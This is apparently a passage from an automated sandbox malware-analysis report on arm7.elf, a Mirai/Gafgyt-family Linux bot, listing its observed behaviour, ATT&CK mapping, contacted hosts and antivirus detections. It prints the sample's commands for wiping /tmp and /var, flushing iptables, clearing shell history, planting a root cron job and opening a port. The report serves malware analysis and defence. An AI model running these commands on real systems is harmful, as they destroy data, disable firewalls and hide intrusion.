        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/113/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/234/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/234/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/114/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/114/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/235/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/235/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/115/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/115/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/236/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/236/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/116/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/116/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/237/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/237/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/117/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/117/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/238/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/238/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/118/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/118/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/239/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/239/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/119/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/119/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/3633/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/3633/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/914/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/914/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/10/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/10/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/917/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/917/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/11/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/11/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/12/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/12/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/5273/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/5273/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/13/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/13/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/14/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/14/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/15/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/15/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/16/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/16/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/17/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/17/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/18/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/18/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/19/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/19/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/240/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/240/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/3095/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/3095/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/120/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/120/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/241/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/241/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/121/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/121/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/242/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/242/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/1/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/1/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/122/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/122/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/243/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/243/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/2/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/2/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/123/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/123/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/244/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/244/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/3/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/3/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/124/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/124/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/245/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/245/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/1588/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/1588/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/125/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/125/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/4/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/4/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/246/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/246/cmdlineJump to behavior
        Source: /tmp/arm7.elf (PID: 5435)Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5441)Shell command executed: /bin/sh -c "rm -rf /tmp/*"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5444)Shell command executed: /bin/sh -c "iptables -F"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5450)Shell command executed: /bin/sh -c "pkill -9 busybox"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5464)Shell command executed: /bin/sh -c "pkill -9 perl"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5469)Shell command executed: /bin/sh -c "pkill -9 python"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5472)Shell command executed: /bin/sh -c "service iptables stop"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5482)Shell command executed: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5486)Shell command executed: /bin/sh -c "service firewall stop"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5517)Shell command executed: /bin/sh -c "history -c"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5519)Shell command executed: /bin/sh -c "rm -rf ~/.bash_history"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5522)Shell command executed: /bin/sh -c "history -w"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5532)Shell command executed: /bin/sh -c "chmod +x /dev/ocmount"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5535)Shell command executed: /bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5537)Shell command executed: /bin/sh -c /dev/ocmountJump to behavior
        Source: /tmp/arm7.elf (PID: 5592)Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5639)Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5645)Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5652)Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5658)Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5548)Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5637)Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5643)Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5648)Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /tmp/arm7.elf (PID: 5654)Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
        Source: /bin/sh (PID: 5534)Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmountJump to behavior
        Source: /bin/sh (PID: 5446)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
        Source: /bin/sh (PID: 5484)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
        Source: /bin/sh (PID: 5485)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
        Source: /bin/sh (PID: 5621)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Source: /bin/sh (PID: 5576)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Source: /bin/sh (PID: 5452)Pkill executable: /usr/bin/pkill -> pkill -9 busyboxJump to behavior
        Source: /bin/sh (PID: 5466)Pkill executable: /usr/bin/pkill -> pkill -9 perlJump to behavior
        Source: /bin/sh (PID: 5471)Pkill executable: /usr/bin/pkill -> pkill -9 pythonJump to behavior
        Source: /bin/sh (PID: 5437)Rm executable: /usr/bin/rm -> rm -rf /tmp/arm7.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-rnzw4f /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Ylvv8i /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-WNhjUf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-NgTmVe /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmpJump to behavior
        Source: /bin/sh (PID: 5443)Rm executable: /usr/bin/rm -> rm -rf /tmp/*Jump to behavior
        Source: /bin/sh (PID: 5521)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_historyJump to behavior
        Source: /usr/sbin/service (PID: 5474)Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5477)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
        Source: /usr/sbin/service (PID: 5479)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
        Source: /usr/sbin/service (PID: 5488)Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5491)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
        Source: /usr/sbin/service (PID: 5493)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
        Source: /tmp/arm7.elf (PID: 5597)Reads from proc file: /proc/statJump to behavior
        Source: /tmp/arm7.elf (PID: 5553)Reads from proc file: /proc/statJump to behavior
        Source: /usr/bin/chmod (PID: 5534)File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /bin/sh (PID: 5535)Crontab like entry written: /etc/cron.d/mount.shJump to dropped file
        Source: /tmp/arm7.elf (PID: 5529)Writes shell script file to disk with an unusual file extension: /dev/ocmountJump to dropped file
        Source: /usr/sbin/service (PID: 5480)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
        Source: /usr/sbin/service (PID: 5494)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
        Source: submitted sampleStderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded./bin/sh: 1: history: not found/bin/sh: 1: history: not found: exit code = 0

        Hooking and other Techniques for Hiding and Protection

        barindex
        Sample deletes itself
        Source: /usr/bin/rm (PID: 5437)File: /tmp/arm7.elfJump to behavior
        Source: /usr/bin/pkill (PID: 5452)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5466)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /tmp/arm7.elf (PID: 5433)Queries kernel information via 'uname': Jump to behavior
        Source: /bin/busybox (PID: 5642)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/busybox (PID: 5660)Queries kernel information via 'uname': Jump to behavior
        Source: /bin/busybox (PID: 5641)Queries kernel information via 'uname': Jump to behavior
        Source: /usr/bin/busybox (PID: 5656)Queries kernel information via 'uname': Jump to behavior
        Source: arm7.elf, 5433.1.000055aede7f7000.000055aede96e000.rw-.sdmp, arm7.elf, 5589.1.000055aede7f7000.000055aede96e000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
        Source: arm7.elf, 5433.1.000055aede7f7000.000055aede96e000.rw-.sdmp, arm7.elf, 5589.1.000055aede7f7000.000055aede96e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: arm7.elf, 5433.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmp, arm7.elf, 5589.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: arm7.elf, 5433.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmp, arm7.elf, 5589.1.00007ffe6d494000.00007ffe6d4b5000.rw-.sdmpBinary or memory string: oeix86_64/usr/bin/qemu-arm/tmp/arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm7.elf

        Stealing of Sensitive Information

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: arm7.elf, type: SAMPLE
        Source: Yara matchFile source: 5433.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5589.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: arm7.elf, type: SAMPLE
        Source: Yara matchFile source: 5433.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5589.1.00007fcc80017000.00007fcc8003d000.r-x.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts1
        Command and Scripting Interpreter        		1
        Systemd Service        		1
        Systemd Service        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		11
        Security Software Discovery        		Remote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		2
        File and Directory Permissions Modification        		LSASS Memory1
        System Network Configuration Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Scripting        		Logon Script (Windows)1
        Hidden Files and Directories        		Security Account Manager2
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Disable or Modify System Firewall        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        File Deletion        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

        Malware Configuration

        No configs have been found

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526773 Sample: arm7.elf Startdate: 06/10/2024 Architecture: LINUX Score: 84 99 octopus1337.geek 156.238.224.214, 43652, 43654, 43656 XHOSTSERVERUS Seychelles 2->99 101 212.118.43.167, 2222, 40720 CITYLAN-ASRU Russian Federation 2->101 103 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->103 107 Antivirus / Scanner detection for submitted sample 2->107 109 Multi AV Scanner detection for submitted file 2->109 111 Yara detected Mirai 2->111 11 arm7.elf 2->11         started        13 udisksd dumpe2fs 2->13         started        15 udisksd dumpe2fs 2->15         started        signatures3 process4 process5 17 arm7.elf 11->17         started        19 arm7.elf sh 11->19         started        21 arm7.elf sh 11->21         started        23 10 other processes 11->23 process6 25 arm7.elf 17->25         started        29 arm7.elf 17->29         started        31 arm7.elf 17->31         started        41 3 other processes 17->41 33 sh service systemctl 19->33         started        35 sh rm 21->35         started        37 sh service systemctl 23->37         started        39 sh rm 23->39         started        43 7 other processes 23->43 file7 95 /dev/ocmount, Bourne-Again 25->95 dropped 117 Manipulation of devices in /dev 25->117 45 arm7.elf 25->45         started        47 arm7.elf sh 25->47         started        57 4 other processes 25->57 51 arm7.elf sh 29->51         started        59 4 other processes 29->59 53 arm7.elf 31->53         started        119 Tries to stop the "iptables" service 33->119 55 service 33->55         started        61 3 other processes 33->61 121 Sample deletes itself 35->121 63 4 other processes 37->63 signatures8 process9 file10 65 arm7.elf sh 45->65         started        67 arm7.elf sh 45->67         started        69 arm7.elf sh 45->69         started        74 2 other processes 45->74 97 /etc/cron.d/mount.sh, ASCII 47->97 dropped 105 Sample tries to persist itself using cron 47->105 71 sh iptables 51->71         started        76 2 other processes 55->76 78 3 other processes 57->78 80 4 other processes 59->80 82 2 other processes 63->82 signatures11 process12 signatures13 84 sh iptables 65->84         started        87 sh busybox 67->87         started        89 sh busybox 69->89         started        115 Executes the "iptables" command to insert, remove and/or manipulate rules 71->115 91 sh 74->91         started        93 sh 74->93         started        process14 signatures15 113 Executes the "iptables" command to insert, remove and/or manipulate rules 84->113

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        arm7.elf50%ReversingLabsLinux.Backdoor.Gafgyt
        arm7.elf38%VirustotalBrowse
        arm7.elf100%AviraEXP/ELF.Mirai.W

        Dropped Files

        SourceDetectionScannerLabelLink
        /dev/ocmount0%ReversingLabs

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        octopus1337.geek
        		156.238.224.214
        		truefalse
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://Change_ip/octopus_re.sh;chmodarm7.elffalse
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            185.125.190.26
            		unknownUnited Kingdom
            		41231CANONICAL-ASGBfalse
            156.238.224.214
            		octopus1337.geekSeychelles
            		394281XHOSTSERVERUSfalse
            212.118.43.167
            		unknownRussian Federation
            		25308CITYLAN-ASRUfalse

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.125.190.26cayo.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
              SecuriteInfo.com.Linux.Siggen.9999.5706.5318.elfGet hashmaliciousMiraiBrowse
                roze.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                  cayo.i686.elfGet hashmaliciousMirai, GafgytBrowse
                    i586.elfGet hashmaliciousUnknownBrowse
                      i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                        SecuriteInfo.com.PUA.Tool.Linux.BtcMine.9999.9051.28507.elfGet hashmaliciousNanominer, XmrigBrowse
                          SecuriteInfo.com.Linux.Rekoobe.1.10153.769.elfGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.Linux.DownLoader.534.29565.17379.elfGet hashmaliciousUnknownBrowse
                              rebirth.mips.elfGet hashmaliciousGafgytBrowse
                                212.118.43.1670tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                  lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                    uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                      DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                        9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                          ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                                            ULDAb4NYKK.elfGet hashmaliciousUnknownBrowse
                                              PAqN0mrUbb.elfGet hashmaliciousUnknownBrowse
                                                TsjmK7qSlf.elfGet hashmaliciousUnknownBrowse
                                                  ZXYyjKa6bs.elfGet hashmaliciousUnknownBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    octopus1337.geekoc_x86_64.elfGet hashmaliciousMiraiBrowse
                                                    • 149.88.81.199
                                                    oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                                    • 149.88.81.199
                                                    oc_mips.elfGet hashmaliciousUnknownBrowse
                                                    • 149.88.81.199
                                                    oc_i686.elfGet hashmaliciousMiraiBrowse
                                                    • 149.88.81.199
                                                    oc_arm7.elfGet hashmaliciousUnknownBrowse
                                                    • 149.88.81.199
                                                    oc_arm.elfGet hashmaliciousUnknownBrowse
                                                    • 149.88.81.199

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CANONICAL-ASGBtarm.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                    • 91.189.91.42
                                                    eWJnMvRVHR.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    bweSL7MAT3.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    z5fPsSjCph.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    YeOJhYQjui.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    RSEVs3nWwI.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    5.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    main_arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    main_ppc.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    CITYLAN-ASRUfile.exeGet hashmaliciousUnknownBrowse
                                                    • 88.210.6.42
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 88.210.6.42
                                                    0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                                    • 212.118.43.167
                                                    lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                                    • 212.118.43.167
                                                    uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                                    • 212.118.43.167
                                                    DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                                    • 212.118.43.167
                                                    9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                                    • 212.118.43.167
                                                    ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                                                    • 212.118.43.167
                                                    h2LK6AsZ1I.exeGet hashmaliciousRisePro StealerBrowse
                                                    • 88.210.9.117
                                                    SecuriteInfo.com.Win32.SpywareX-gen.4316.21522.exeGet hashmaliciousDanaBotBrowse
                                                    • 88.210.13.105
                                                    XHOSTSERVERUShttps://tiktokmal1vip.com/Get hashmaliciousUnknownBrowse
                                                    • 156.238.242.50
                                                    https://tkglobalmall.vip/Get hashmaliciousUnknownBrowse
                                                    • 156.238.242.50
                                                    https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                                                    • 156.238.197.18
                                                    M46uio5ezW.exeGet hashmaliciousXWormBrowse
                                                    • 156.238.224.69
